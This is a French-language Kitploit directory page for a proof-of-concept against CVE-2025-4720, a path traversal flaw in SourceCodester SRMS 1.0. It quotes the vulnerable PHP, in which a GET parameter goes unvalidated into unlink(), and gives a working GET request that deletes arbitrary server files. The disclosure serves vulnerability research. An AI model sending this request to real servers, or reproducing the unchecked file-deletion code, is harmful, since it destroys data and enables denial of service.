Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
duplicate-CVE-2025-4720- — Exploit de preuve de concept pour CVE-2025-4720, une vulnérabilité de traversée de chemin dans SourceCodester SRMS 1.0 permettant la suppression arbitraire de fichiers via le point de terminaison drop_student.php. | Kitploit
Outils/GitHubGitHub/xmyronn/duplicate-cve-2025-4720-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubxmyronn/duplicate-cve-2025-4720-

duplicate-CVE-2025-4720-

Exploit de preuve de concept pour CVE-2025-4720, une vulnérabilité de traversée de chemin dans SourceCodester SRMS 1.0 permettant la suppression arbitraire de fichiers via le point de terminaison drop_student.php.

Voir le dépôt
46il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

cve-srms-drop-student-path-traversal (CVE-2025-4720)(doublon)

Suppression arbitraire de fichiers dans SourceCodester SRMS 1.0

Description

Une vulnérabilité de traversée de chemin existe dans le point de terminaison drop_student.php de SourceCodester Student Result Management System (SRMS) 1.0.

L'application prend une entrée contrôlée par l'utilisateur depuis le paramètre GET img et la transmet directement à la fonction unlink() sans validation, permettant la suppression de fichiers arbitraires sur le serveur.


Code vulnérable

root@kitploit:~
$img = $_GET['img'];

if ($img == "DEFAULT") {

} else {
    unlink('images/students/' . $img);
}

Type de vulnérabilité

  • CWE-22: Traversée de chemin
  • Impact : Suppression arbitraire de fichiers

Preuve de concept (PoC)

  1. Créez un fichier à la racine de l'application : Screenshot 2026-04-04 013454
root@kitploit:~
C:\xampp\htdocs\srms_0\srms\new_test.txt
  1. Envoyez la requête suivante : Screenshot 2026-04-04 013510
Screenshot 2026-04-04 013633
root@kitploit:~
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
  1. Observez que le fichier est supprimé du serveur. Screenshot 2026-04-04 013650

Impact

Un attaquant peut supprimer des fichiers arbitraires accessibles au serveur web, notamment :

  • Fichiers de configuration de l'application
  • Journaux (logs)
  • Contenu téléversé

Cela peut entraîner un déni de service ou une exploitation ultérieure.


Remarques supplémentaires

Cette vulnérabilité représente un vecteur d'attaque distinct par rapport aux problèmes précédemment signalés dans SRMS, car elle :

  • Utilise une requête GET
  • Ne nécessite pas de téléversement de fichier
  • Peut potentiellement être exploitée via CSRF

Éditeur

SourceCodester


Produit

Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho


Version

1.0


Auteur

Imad Alvi

Télécharger l’outil